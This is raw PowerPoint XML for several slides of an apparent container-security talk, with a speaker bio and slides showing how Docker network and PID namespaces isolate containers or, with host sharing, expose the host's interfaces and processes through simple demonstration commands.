        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{32C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Namespaces - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rechteck 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="429290" y="1564374"/>
            <a:ext cx="11377899" cy="81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9977" tIns="179977" rIns="179977" bIns="179977" rtlCol="0" anchor="t" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>When containers are launched, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>unique network interface and IP address is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>created</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> run -it alpine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>show</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 41"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429291" y="3062428"/>
            <a:ext cx="11377899" cy="2881172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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278884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461" name="think-cell Slide" r:id="rId6" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId6" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="21" name="Object 20"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2" name="Rectangle 2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US" sz="2800" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{32C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Namespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>- Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rechteck 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="429290" y="1564373"/>
            <a:ext cx="11377899" cy="100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9977" tIns="179977" rIns="179977" bIns="179977" rtlCol="0" anchor="t" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>By changing the namespace to host, the container will share the same network interface and IP address of the host machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> run -it --net=host alpine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> show</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2893344" y="2640506"/>
            <a:ext cx="6605862" cy="3898406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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087111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pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617912" y="642736"/>
            <a:ext cx="1837042" cy="492443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Specialist at a Bank.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>6+ years experience in InfoSec.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keen on breaking/bypassing security controls and containers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>10+ CVEs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763359" y="4395052"/>
            <a:ext cx="10438041" cy="1550574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" indent="-457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disclaimer: Opinions are my own and not the views of my employer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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81786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507" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="21" name="Object 2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2" name="Rectangle 2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US" sz="2800" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{32C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Namespaces - PID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rechteck 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="429290" y="1564374"/>
            <a:ext cx="11377899" cy="58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9977" tIns="179977" rIns="179977" bIns="179977" rtlCol="0" anchor="t" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run -it alpine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> aux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155007" y="2737477"/>
            <a:ext cx="10046393" cy="1010766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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081445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531" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="21" name="Object 2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2" name="Rectangle 2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US" sz="2800" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{32C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Namespaces - PID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rechteck 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="507325" y="1348853"/>
            <a:ext cx="11377899" cy="1040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9977" tIns="179977" rIns="179977" bIns="179977" rtlCol="0" anchor="t" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>allocating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> namespace of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>the host, the container can also see all other system processes running on the operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
